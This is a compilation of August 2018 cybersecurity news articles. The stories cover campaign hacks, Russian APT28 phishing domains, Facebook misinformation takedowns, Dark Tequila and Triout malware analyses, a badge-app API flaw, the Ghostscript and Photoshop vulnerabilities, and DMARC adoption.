Skype has been long using TLS (transport-level security) and AES (Advanced Encryption Standard) to encrypt messages in transit, but the addition of end-to-end encryption adds an extra layer of privacy.

Now, not only are the conversation channels secured, but also are all of the transmitted messages kept encrypted when on Microsoft’s servers, meaning that they are only accessible to those engaged in the conversation.

Private Conversations, however, can only be accessed on one device at a time, the software giant reveals.

To take advantage of the feature, users simply need to tap or click on New Chat and then select Private Conversation. Next, they need to select the contacts they want to start the private conversation with, and these will receive a notification asking them to accept the invitation.

Once a contact accepts the invitation, the private conversation is available on the devices the invitation was sent from/accepted on.

One can also start a private conversation with a contact they are already chatting with.

Users can also delete private conversations, meaning that all of the content will be erased from the device. They can then pick up the conversation again, without having to send a new invitation.

FBI Probes Computer Hacks in California House Campaigns
22.8.2018 securityweek BigBrothers

HUNTINGTON BEACH, Calif. (AP) — The FBI launched investigations after two Southern California Democratic U.S. House candidates were targeted by computer hackers, though it's unclear whether politics had anything to do with the attacks.

A law enforcement official told The Associated Press the FBI looked into hacks involving David Min in the 45th Congressional District and Hans Keirstead in the adjacent 48th District. Both districts are in Orange County and are seen as potential pickups as the Democratic Party seeks to win control of the Congress in November.

A person with knowledge of the Min investigation told the AP on Monday that two laptops used by senior staffers for the candidate were found infected with malware in March. It's not clear what, if any, data was stolen, and there is no evidence the breach influenced the contest.

The CEO of a biomedical research company, Keirstead last summer was the victim of a broad "spear-phishing" attack, in which emails that appear to come from a friend or familiar source are designed to help hackers snatch sensitive or confidential information, the law enforcement official said. There is no evidence Keirstead lost valuable information.

The investigations so far have not turned up evidence the two candidates in Orange County were political targets.

The official and the knowledgeable person were not authorized to discuss the cases publicly and spoke only on condition of anonymity.

Keirstead was narrowly defeated in the June primary for the seat held by Republican Rep. Dana Rohrabacher. Min came in third in the contest to unseat Republican Rep. Mimi Walters.

Min's staff was alerted to a potential cyberattack by a facility manager in the software incubator where his campaign rented space. It was later found the computers were infected with software that records and sends keystrokes, with additional software that concealed it from conventional anti-virus tools used by the campaign.

Hackers also used a broad spear-phishing attack in an attempt to gain access, and FBI investigators are still piecing together additional details, the official said.

The two laptops were replaced, and Min's computer was not infected. The attack on the computers was first reported by Reuters.

Keirstead campaign officials detected repeated attempts to access the campaign's website.

Rolling Stone magazine, which first reported that cyberattack, said hackers or bots tried different username-password combinations in a rapid-fire sequence over a two-and-a-half-month period to get inside the campaign's WordPress-hosted website.

According to the campaign, there were also more than 130,000 so-called brute force attempts over a monthlong period to gain access to the campaign's server through the cloud-server company that hosted the Keirstead campaign's website, Rolling Stone said.

Computer security experts say that many attempts to gain access to a site hosted with the popular and free WordPress software is not unusual.

"Every WordPress hosted website sees 130,000 brute force attempts over a monthlong period, regardless whether it's Bohemian basket weaving, a blog about furry costume construction, or a politician website," said Robert Graham, a cybersecurity expert who created the BlackICE personal firewall.

"Hackers don't know or care who you are: they only care that you use WordPress," Graham said in a text message.

Min finished third behind fellow Democrat Katie Porter, who faces Walters in November. In the 48th District, Rohrabacher will face Democrat Harley Rouda, who snagged the second runoff spot by defeating Keirstead by 125 votes.

Russian Hackers Went After Conservative US Groups: Microsoft
22.8.2018 securityweek BigBrothers

The Russian hacking unit that tried to interfere in the US presidential election has been targeting conservative US think tanks, Microsoft said.

Acting on a court order, the company last week seized control of six fake websites involved in such efforts, which also involved a site that mimicked the US Senate, Microsoft president Brad Smith said in a blog post Monday.

The hackers were linked to the Russian military intelligence agency known as the GRU, Smith wrote.

The idea was to have people think they were accessing links managed by these US political groups but redirect them to fake ones run by the hackers so passwords and other information could be stolen.

Smith said one such site appeared to mimic that of the International Republican Institute, which promotes democratic principles and whose board includes Republican senators, among them John McCain, who have been critical of President Vladimir Putin.

Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity.

"We're concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections," Smith wrote.

Experts said the aim was to go after anyone who opposes Putin.

"This is another demonstration of the fact that the Russians aren't really pursuing partisan attacks. They are pursuing attacks that they perceive in their own national self-interest," Eric Rosenbach, the director of the Defending Digital Democracy project at Harvard University, told the New York Times.

"It's about disrupting and diminishing any group that challenges how Putin's Russia is operating at home and around the world," Rosenbach added.

The Kremlin dismissed the fresh allegations, with spokesman Dmitry Peskov saying he did not know "which hackers are being talked about, what influencing of elections".

"We do not understand what Russian military intelligence has to do with this. What are the basis of such serious accusations? They should not be raised without some foundation," he told journalists.

Code Analysis Firm Semmle Launches With $21 Million in Funding
22.8.2018 securityweek IT

Semmle, a company whose software engineering analytics platform is already used by several major companies, on Tuesday announced its global launch, along with a $21 million Series B funding round.

This funding round, led by Accel Partners with participation from Work-Bench, brings the total raised by the company to date to $31 million. The newly acquired funds will be used to accelerate Semmle’s go-to-market efforts serving large tech and financial services companies worldwide.

Semmle offers two products designed to help organizations find coding errors that can introduce critical vulnerabilities. One of the products, QL, is a software analytics engine that treats code as data so that it can be quickly and accurately analyzed by developers and security response teams.Semmle launches globally

“The same kinds of logical coding mistakes are made over and over again, sometimes repeatedly within a single project, and sometimes across the whole software ecosystem. These mistakes are the source of many of today’s critical software vulnerabilities,” Semmle explained on its website. “Using QL, you can codify such mistakes as queries, find logical variants of the same mistake elsewhere in the code, and prevent similar mistakes from being introduced in the future by automatically catching them before code gets merged.”

QL powers Semmle’s second product, LGTM, whose name stems from “Looks Good to Me,” which programmers use to express approval when reviewing software.

LGTM is a software engineering analytics platform that combines deep semantic code search and data science insights from a community of hundreds of thousands of developers. The platform, which Semmle claims is easy to integrate into the developer workflow, provides feedback, coding recommendations, and benchmarking insights.

Semmle’s platform has already been used in the past years by Microsoft, Google, Capital One, Credit Suisse, Nasdaq and NASA, which has helped the company perfect its product, said Oege de Moor, CEO and co-founder of Semmle.

The commercial product is now being made available to the rest of the world.

“On August 21, for the first time, any company can have access to our enterprise product and benefit from the work of leading technology companies like Google and Microsoft. Every customer benefits from the work that these security researchers report back to our vulnerability analysis repository — we are pioneering security as a public good,” de Moor told SecurityWeek.

“The LGTM community is our security research team, and this is one of the most powerful aspects of our platform. The leading companies using our tools have now made insights available to the rest of our customers, who might not have the resources or scale to invest in product security teams to hunt for vulnerabilities,” he added.

Semmle is the company that last year reported CVE-2017-9805, an Apache Struts vulnerability that ended up being exploited in the wild.

CrowdStrike Adds Malware Search Engine to 'Hybrid Analysis'
22.8.2018 securityweek

Endpoint security firm CrowdStrike on Tuesday announced that new search capabilities have been added to the company’s Hybrid Analysis service.

Hybrid Analysis is a free malware analysis service owned by CrowdStrike since November 2017, when it acquired Payload Security, the firm that originally developed the automated malware analysis sandbox technology.

Hybrid Analysis leverages CrowdStrike’s Falcon Sandbox, a malware analysis framework that the company claims has been used worldwide by many security operations centers, CERTs, cyber forensics labs, researchers and threat intelligence services.

Starting with August 21, Hybrid Analysis also includes malware search features powered by CrowdStrike’s Falcon MalQuery, a proprietary cloud-based malware research tool that allows industry professionals to quickly and efficiently search a massive collection of samples.

The addition of Falcon MalQuery to Hybrid Analysis allows users to quickly scan through petabytes of threat data based on YARA rules or string/binary patterns. Each search can be refined based on certain criteria, such as the type, date and size of the file.

CrowdStrike adds Falcon MalQuery to Hybrid Analysis

According to the security firm, running a scan takes only minutes instead of hours, and search results can be downloaded and shared.

CrowdStrike has described the addition of Falcon MalQuery to Hybrid Analysis as donating the tool to the community.

The company has published a blog post that briefly explains how the new search capabilities work.

Adobe Patches Critical Code Execution Flaws in Photoshop
22.8.2018 securityweek

Adobe late on Tuesday released updates for the Windows and macOS versions of Photoshop CC to address two critical remote code execution vulnerabilities.

The flaws impact Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions. The issues have been addressed with the release of versions 19.1.6 and 18.1.6.

The security holes, reported by Kushal Arvind Shah of Fortinet's FortiGuard Labs, have been described by Adobe as memory corruption bugs that can be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

The vulnerabilities are tracked as CVE-2018-12810 and CVE-2018-12811.

While the flaws have been assigned a “critical” severity rating, their priority rating is “3,” which indicates that the affected product has historically not been targeted by malicious actors. In this case, users are advised by Adobe to install the updates “at their discretion.”

Earlier this month, Adobe addressed nearly a dozen vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader with the company’s Patch Tuesday updates for August 2018. None of the flaws have been exploited in the wild.

It’s unclear why the Photoshop CC updates were not included in the Patch Tuesday updates.

Last month, researchers claimed they had found a potentially serious security issue in Adobe’s internal systems, but the company downplayed the impact of the vulnerability saying it was only an XSS flaw.

Facebook Stops Misinformation Campaigns Tied to Iran, Russia
22.8.2018 securityweek

Facebook said Tuesday it stopped stealth misinformation campaigns from Iran and Russia, shutting down accounts as part of its battle against fake news ahead of elections in the United States and elsewhere.

Facebook removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing," according to chief executive Mark Zuckerberg.

While the investigation was ongoing, and US law enforcement notified, content from some of the pages was traced back to Iran and from others linked to groups previously linked to Russian intelligence operations, the social network said.

"We believe they were parts of two sets of campaigns," Zuckerberg said.

The accounts, some of them at Facebook-owned Instagram, were presented as being independent news or civil society groups but were actually working in coordinated efforts, social network firm executives said in a briefing with reporters.

Content posted by accounts targeted Facebook users in Britain, Latin America, the Middle East and the US, according to head of cybersecurity policy Nathaniel Gleicher.

He said that posts by the involved accounts were still being scrutinized and their goals were unclear at this point.

The Facebook investigation was prompted by a tip from cybersecurity firm FireEye regarding a collection of "Liberty Front Press" pages at the social network and other online services.

Facebook linked the pages to Iranian state media through publicly available website registration information, computer addresses and information about account administrators, according to Gleicher.

Among the accounts was one from "Quest 4 Truth" claiming to be an independent Iranian media organization. It was linked to Press TV, an English-language news network affiliated with Iranian state media, Gleicher said.

The first "Liberty Front Press" accounts found were at Facebook were created in 2013 and posted primarily political content focused on the Middle East along with Britain, Latin America and the US.

- Russian military tie -

Facebook also removed a set of pages and accounts linked to sources the US government previously identified as Russian military services, according to Gleicher.

"While these are some of the same bad actors we removed for cybersecurity attacks before the 2016 US election, this more recent activity focused on politics in Syria and Ukraine," Gleicher said.

The accounts were associated with Inside Syria Media Center, which the Atlantic Council and other organizations have identified as covertly spreading pro-Russian and pro-Assad content.

US Senator Richard Burr, a Republican who chairs the select committee on intelligence, said that the halted campaigns further prove that "the goal of these foreign social media campaigns is to sow discord" and "that Russia is not the only hostile foreign actor developing this capability."

Facebook chief operating officer Sheryl Sandberg is among Silicon Valley executives set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.

"We get that 2018 is a very important election year, not just in the US," Zuckerberg responded when asked about the upcoming hearing.

"So this is really serious. This is a top priority for the company."

In July, Facebook shut down more than 30 fake pages and accounts involved in what appeared to be a "coordinated" attempt to sway public opinion on political issues ahead of November midterm elections, but did not identify the source.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied to Russia, which used the platform to spread disinformation ahead of the 2016 US presidential election.

Badge Reading App Exposed Details of Black Hat Conference Attendees
21.8.2018 securityweek Congress

A researcher discovered that a vulnerability in the badge reading app used at the recent Black Hat security conference exposed the registration details of all attendees.

The badges provided to people attending Black Hat and other conferences contain an NFC tag. When vendors scan the tag, they obtain the information provided during the registration process by the individual wearing the badge.

At Black Hat the tag was scanned using BCARD, a trade-show and conference badge reading application developed by ITN International. The app is designed to work on tablets and phones running Android or iOS.

Vulnerability in BCARD conference badge scanning app

A researcher who uses the online moniker “NinjaStyle” analyzed the BCARD application and discovered an API that could be used to obtain an attendee’s data without authentication based on the unique badgeID value assigned to each user.

NinjaStyle then conducted some tests to determine if a brute-force attack could be used to obtain information on all Black Hat attendees.

“After trying a few hundred requests on both 0-100000 and 000000-100000 and receiving no valid badges, I determined that those were likely not going to be valid ID ranges. We could then assume that valid IDs are 100000-999999. This leaves us with 900,000 total requests. With an estimated 18,000 BlackHat attendees, we can then assume that we will enumerate a valid badgeID in approximately 2% of our requests,” the researcher wrote in a blog post published on Monday.

He determined that a brute-force attack on the API would allow an attacker to obtain the names, email addresses, company names, phone numbers and addresses of all Black Hat attendees in roughly six hours.

The researcher reported his findings to ITN on August 9 and while he initially encountered some difficulties in establishing contact with the company, the issue was patched by August 13. ITN said it had addressed the vulnerability by disabling the problematic API, which it claimed had been a legacy system.

This is not the first time experts have found vulnerabilities in one of the apps used at the Black Hat conference. Back in 2016, the event’s organizers were forced to update the official application after researchers discovered several flaws that could have been exploited to impersonate users and spy on them.

Also in 2016, researchers found that the badge scanning application provided by RSA Conference organizers to vendors had been affected by a security bypass flaw caused by a default password left in the code.

New Spyware Framework for Android Discovered
21.8.2018 securityweek

A newly identified spyware framework can be used to build extensive surveillance capabilities into Android applications, Bitdefender security researchers warn.

Dubbed Triout, the malware made its first appearance on May 15, when a sample was uploaded to VirusTotal. Although initially submitted from Russia, most of the scans came from Israel.

The malware’s command and control (C&C) server has been running since May 2018 as well, and Bitdefender says that it appears to continue to be operational at the time of this report.

In a technical whitepaper (PDF), Bitdefender’s Cristofor Ochinca explains that the analyzed sample doesn’t use obfuscation, meaning that the security researchers gained immediate access to the source code by simply unpacking the APK file.

“This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices,” Ochinca points out.

The spyware was discovered bundled with a repackaged application that kept the appearance and all the functionality of the original, supposedly so as not to tip victims off. The malicious payload is the only thing that sets the two apart.

Once on a compromised system, Triout can start its extensive surveillance capabilities, which range from phone call recording to GPS tracking.

Specifically, the malware can record every phone call, save it in the form of a media file, and send the recording, along with the caller ID, to the C&C server. Moreover, it can also log all incoming SMS messages to the C&C (both SMS body and sender are exfiltrated).

Triout also sends all snapped photos to the C&C, regardless of whether taken with the front or rear camera, and can send call logs to the server as well. On top of all that, it can send the device’s GPS coordinates to the C&C, and can hide itself on the infected device.

What the security researchers couldn’t determine as of now is how the infected application was disseminated.

The sample was a repackaged version of an adult application that was listed in Google Play in 2016, but was since removed. Thus, the actor might have used third-party marketplaces or attacker-controlled domains to host the sample, Bitdefender says.

Microsoft's Anti-Hacking Efforts Make it an Internet Cop
21.8.2018 securityweek BigBrothers

Intentionally or not, Microsoft has emerged as a kind of internet cop by devoting considerable resources to thwarting Russian hackers.

The company's announcement Tuesday that it had identified and forced the removal of fake internet domains mimicking conservative U.S. political institutions triggered alarm on Capitol Hill and led Russian officials to accuse the company of participating in an anti-Russian "witch hunt."

Microsoft stands virtually alone among tech companies with an aggressive approach that uses U.S. courts to fight computer fraud and seize hacked websites back. In the process, it has acted more like a government detective than a global software giant.

In the case this week, the company did not just accidentally stumble onto a couple of harmless spoof websites. It seized the latest beachhead in an ongoing struggle against Russian hackers who meddled in the 2016 presidential election and a broader, decade-long legal fight to protect Microsoft customers from cybercrime.

"What we're seeing in the last couple of months appears to be an uptick in activity," Brad Smith, Microsoft's president and chief legal officer, said in an interview this week. Microsoft says it caught these particular sites early and that there's no evidence they were used in hacking.

The Redmond, Washington, company sued the hacking group best known as Fancy Bear in August 2016, saying it was breaking into Microsoft accounts and computer networks and stealing highly sensitive information from customers. The group, Microsoft said, would send "spear-phishing" emails that linked to realistic-looking fake websites in hopes targeted victims — including political and military figures — would click and betray their credentials.

The effort is not just a question of fighting computer fraud but of protecting trademarks and copyright, the company argues.

One email introduced as court evidence in 2016 showed a photo of a mushroom cloud and a link to an article about how Russia-U.S. tensions could trigger World War III. Clicking on the link might expose a user's computer to infection, hidden spyware or data theft.

An indictment from U.S. special counsel Robert Mueller has tied Fancy Bear to Russia's main intelligence agency, known as the GRU, and to the 2016 email hacking of both the Democratic National Committee and Democrat Hillary Clinton's presidential campaign.

Some security experts were skeptical about the publicity surrounding Microsoft's announcement, worried that it was an overblown reaction to routine surveillance of political organizations — potential cyberespionage honey pots— that never rose to the level of an actual hack.

The company also used its discovery as an opportunity to announce its new free security service to protect U.S. candidates, campaigns and political organizations ahead of the midterm elections.

But Maurice Turner, a senior technologist at the industry-backed Center for Democracy and Technology, said Microsoft is wholly justified in its approach to identifying and publicizing online dangers.

"Microsoft is really setting the standards with how public and how detailed they are with reporting out their actions," Turner said.

Companies including Microsoft, Google and Amazon are uniquely positioned to do this because their infrastructure and customers are affected. Turner said they "are defending their own hardware and their own software and to some extent defending their own customers."

Turner said he has not seen anyone in the industry as "out in front and open about" these issues as Microsoft.

As industry leaders, Microsoft's Windows operating systems had long been prime targets for viruses when in 2008 the company formed its Digital Crimes Unit, an international team of attorneys, investigators and data scientists. The unit became known earlier in this decade for taking down botnets, collections of compromised computers used as tools for financial crimes and denial-of-service attacks that overwhelm their targets with junk data.

Richard Boscovich, a former federal prosecutor and a senior attorney in Microsoft's digital crimes unit, testified to the Senate in 2014 about how Microsoft used civil litigation as a tactic. Boscovich is also involved in the fight against Fancy Bear, which Microsoft calls Strontium, according to court filings.

To attack botnets, Microsoft would take its fight to courts, suing on the basis of the federal Computer Fraud and Abuse Act and other laws and asking judges for permission to sever the networks' command-and-control structures.

"Once the court grants permission and Microsoft severs the connection between a cybercriminal and an infected computer, traffic generated by infected computers is either disabled or routed to domains controlled by Microsoft," Boscovich said in 2014.

He said the process of taking over the accounts, known as "sinkholing," enabled Microsoft to collect valuable evidence and intelligence used to assist victims.

In the latest action against Fancy Bear, a court order filed Monday allowed Microsoft to seize six new domains, which the company said were either registered or used at some point after April 20.

Smith said this week the company is still investigating how the newly discovered domains might have been used.

A security firm, Trend Micro, identified some of the same fake domains earlier this year. They mimicked U.S. Senate websites, while using standard Microsoft log-in graphics that made them appear legitimate, said Mark Nunnikhoven, Trend Micro's vice president of cloud research.

Microsoft has good reason to take them down, Nunnikhoven said, because they can hurt its brand reputation. But the efforts also fit into a broader tech industry mission to make the internet safer.

"If consumers are not comfortable and don't feel safe using digital products," they will be less likely to use them, Nunnikhoven said.

DMARC Use is Growing, But Difficult to Configure Correctly and Completely
21.8.2018 securityweek Safety

The Use of DMARC is Growing -- But it is Difficult to Configure Correctly and Completely

Valimail, an email security firm, has been looking at the incidence of fake emails. Not all emails, but just those that spoof the 'From:' line with a valid name and domain -- that is, exact-domain sender spoofing. These are perhaps the most difficult to spot and the most dangerous, resulting in spear-phishing attacks leading to stolen credentials and BEC scams. PhishMe, now known as Cofense, claims that 91% of all cyber-attacks start with a phishing email, while Trend Micro has estimated that global BEC losses will exceed $9 billion this year.

A report from GreatHorn published at the end of July 2017 suggests that the majority of email users do not consider it to be a serious threat vector. GreatHorn's CEO and co-founder Kevin O'Brien told SecurityWeek, "Sixty-six percent of all the people we interviewed said the only threat they saw in their inbox was spam." The implication is that organizations must not rely on users to spot the difference between genuine and fake emails.

The problem leading to all fake emails is the lack of authentication security in the email application. All security has to be applied from the outside; but this has been done for exact-domain sender spoofing -- DMARC, SPF and DKIM. Valimail's analysis (PDF) of fake emails and DMARC examined a representative set of processed emails asking for DMARC or SPF authentication.

The good news is that in Q1 2018, 96.2% of emails using DMARC authentication were identified as legitimate. Not so good is that 1.5% failed DMARC, but were from senders known to be legitimate. The worrying figure is 2.3% of the DMARC emails failed DMARC and come from suspicious or malicious senders.

2.3% may seem a low percentage, but extrapolated, it suggests that 6.4 billion fake emails are sent every day.

The use of DMARC to prevent exact-domain sender spoofing is growing -- but it is difficult to configure correctly and completely. Every single service that sends emails must be found and included, and the policy must be set to enforced. DMARC, using SPF or DKIM authentication, aligns the stated sender with the actual source. If the alignment fails, the domain owner can choose between doing nothing (let it go through anyway), send it to a spam folder, or delete it. The mail gateway performing the checks then reports the results to the domain owner or a designated agent.

Valimail finds that most companies that start to implement DMARC never quite fully succeed. The enforcement failure rate, for example, hovers around 75-80% for almost all organizations over the last three quarters. The one bright spot is U.S. federal agencies. Here the failure rate tumbled from 80% in Q3 2017 to 40% in Q2 2018.

Federal agencies have also bucked the norm in all other categories examined by Valimail. By multiplying the category's DMARC usage rate with its enforcement success rate, Valimail comes up with a fraud protection rate. Federal agencies' fraud protection rate has grown from 4% in in Q3 2017 to 43% in Q2 2018. The next best rate comes from the U.S. tech company category at less than 16% (global media companies fare worst at less than 4%).

Federal agencies are also ahead in DMARC usage. In Q3 2017, just 20% of agencies used DMARC. By Q2 2018, this had risen to more than 70%. Tech companies again come second, rising from just under 50% to just over 50% (and global media companies come bottom again at around 15%).

Valimail puts the huge improvement shown by federal agencies down to the DHS. "This is due directly to the Department of Homeland Security's October 2017 directive requiring all executive-branch agencies to implement DMARC on a one-year timeline," says the report. "Since the executive branch accounts for the vast majority of the 1,315 federal .gov domains, that directive, known as BOD 18-01, has had a huge impact on DMARC usage in this group."

"Valimail's research shows that fake email continues to be a major problem worldwide," comments Alexander García-Tobar, CEO and co-founder of Valimail. He added: "There are encouraging signs of progress in the fight against fake email, starting with the U.S. federal government, where we've seen an unprecedented deployment of anti-impersonation technologies, thanks to a mandate by the Department of Homeland Security. There's still a long way to go, but the DHS example shows that stopping email impersonation is both critical to our highest institutions and achievable."

Dark Tequila Añejo
22.8.2018 Kaspersky Hacking

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

A multi-stage payload is delivered to the victim only when certain conditions are met; avoiding infection when security suites are installed or the sample is being run in an analysis environment. From the target list retrieved from the final payload, this particular campaign targets customers of several Mexican banking institutions and contains some comments embedded in the code written in the Spanish language, using words only spoken in Latin America.

Most of the victims are located in Mexico. The campaign has been active since at least 2013, so it is a very ‘añejo’ (mature) product. There are two known infection vectors: spear-phishing and infection by USB device.

The threat actor behind it strictly monitors and controls all operations. If there is a casual infection, which is not in Mexico or is not of interest, the malware is uninstalled remotely from the victim’s machine.

(Translation for “Abrir la carpeta para ver los archivos” – “Open folder to see files”. The word “Archivos” is used by Spanish speakers from Latin America only)

The Dark Tequila malware and its supporting infrastructure are unusually sophisticated for a financial fraud operation. The malicious implant contains all the modules required for the operation and, when instructed to do so by het command server, different modules decrypt and activate. All stolen data is uploaded to the server in encrypted form.

This campaign modules are as follows:

Module 1, which is responsible for communication with the command and control server. It verifies if a man-in-the-middle network check is being performed, by validating the certificates with a few very popular websites.
Module 2 – CleanUp. If the service detects any kind of ‘suspicious’ activity in the environment, such as the fact that it is running on a virtual machine, or that debugging tools are running in the background, it will execute this module to perform a full cleanup of the system, removing the persistence service as well as any files created previously on the system.
Module 3 – Keylogger and Windows Monitor. This is designed to steal credentials from a long list of online banking sites, as well as generic Cpanels, Plesk, online flight reservation systems, Microsoft Office365, IBM lotus notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
Module 4 – Information stealer, which is designed to steal saved passwords in email and FTP clients, as well as from browsers.
Module 5 – The USB infector. This copies an executable file to a removable drive to run automatically. This enables the malware to move offline through the victim’s network, even when only one machine was initially compromised via spear-phishing. When another USB is connected to the infected computer, it automatically becomes infected, and ready to spread the malware to another target.
Module 6 – The service watchdog. This service is responsible for making sure that the malware is running properly.
The campaign remains active. It is designed to be deployed in any part of the world, and attack any targets according to the interests of the threat actor behind it. Kaspersky Lab detects the campaign as Trojan.Win32.DarkTequila and Trojan.Win64.DarkTequila.

Reference hashes:

Reference C2s:

A critical remote code execution flaws in Ghostscript could allow to completely take over affected system
21.8.2018 securityaffairs

The popular Google Project Zero white hat hacker Tavis Ormandy has found a critical remote code execution (RCE) vulnerability in Ghostscript.
Ghostscript is an open source suite of software based on an interpreter for Adobe Systems’ PostScriptand Portable Document Format (PDF) page description languages.

Ghostscript is a multiplatform software written in C language, it allows to convert PostScript language files (or EPS) to several raster formats (i.e. PDF, XPS, PCL or PXL).

Many PDF and image editing software such as GIMP and ImageMagick leverage the library to convert file formats.

Ghostscript implements a -dSAFER sandbox protection option that handles untrusted documents, it aims at preventing malicious PostScript operations from being executed.

A couple of years ago, Ormandy disclosed several -dSAFER sandbox escapes in the popular library, at the time he found a few file disclosure, shell command execution, memory corruption and type confusion bugs.

Now Ormandy discovered that the library contains multiple -dSAFER sandbox bypass flaws that could be exploited by a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.

A remote attacker can trigger the flaw by sending a specially crafted malicious file (i.e. PDF, PS, EPS, or XPS) to the victim. Once the victim has opened the file with an application using vulnerable software, the attacker will be able to execute arbitrary code of the system and to take over it.

Artifex Software, the company that maintains the open source software still hasn’t released any security update to address the vulnerability.

The US-CERT published a security advisory to warn that applications using the Ghostscript library by default to process PostScript content are vulnerable.

“Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities, which may allow a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.” reads the security advisory.

“By causing Ghostscript or a program that leverages Ghostscript to parse a specially-crafted file, a remote, unauthenticated attacker may be able to execute arbitrary commands with the privileges of the Ghostscript code.”


Both RedHat and Ubuntu distros have confirmed that they are affected by this vulnerability.

Ormandy recommends Linux distros to disable the processing of PS, EPS, PDF, and XPS content until the vulnerability is fixed.

“I *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default,” suggested Ormandy.

Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.2018 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting 2018 midterm elections, the experts attributed the attacks to Russia-linked APT28 group.
Microsoft has spotted a new hacking campaign targeting 2018 midterm elections.

The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at Members of United States’ Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and operates under the Russian military agency GRU and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to US Senate and conservative organizations to infect the visitors’ systems.

APT28 fake domains

Three bogus domains were created to appear as legitimate sites belonging to U.S. Senate, a fourth non-political website spoofed Microsoft’s online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months, hackers registered them with major web-hosting companies.

2018 midterm elections fake election websites
Microsoft did not provide further details on the attacks.

“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified targeted organizations.
At the time it is not possible to say if the fake attacks allowed the cyberspies to compromise the visitors’ machines, Microsoft’s post doesn’t mention any sinkhole investigation conducted by its experts.
Microsoft shut down dozens of other fake websites since 2016 after it has obtained the authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt hacking into US politics and for this reason, Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”

The discovery made by Microsoft is part of the Microsoft’s Defending Democracy Program launched in April that is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft announced also its initiative AccountGuard that provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

Dark Tequila Banking malware targets Latin America since 2013
21.8.2018 securityaffairs

Kaspersky Labs detected a sophisticated piece of banking malware dubbed Dark Tequila that was used to target customers of several Mexican banks.
Security experts from Kaspersky Labs have spotted a sophisticated strain of banking malware dubbed Dark Tequila that was used to target customers of several Mexican financial institutions.

According to the researchers, the complex Dark Tequila malware went undetected since at least 2013.

Dark Tequila is a multistage malware that spreads via spear-phishing messages and infected USB devices.

The malware steals financial data from a long list of online banking sites from infected systems, it is also able to gather credentials to popular websites, business and personal email addresses, domain registers, and file storage accounts.

The list of websites targeted by the malware includes “Cpanels, Plesk, online flight reservation systems, Microsoft Office 365, IBM Lotus Notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.”

“Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.” reads the analysis published by Kaspersky.

“A multi-stage payload is delivered to the victim only when certain conditions are met; avoiding infection when security suites are installed or the sample is being run in an analysis environment.”

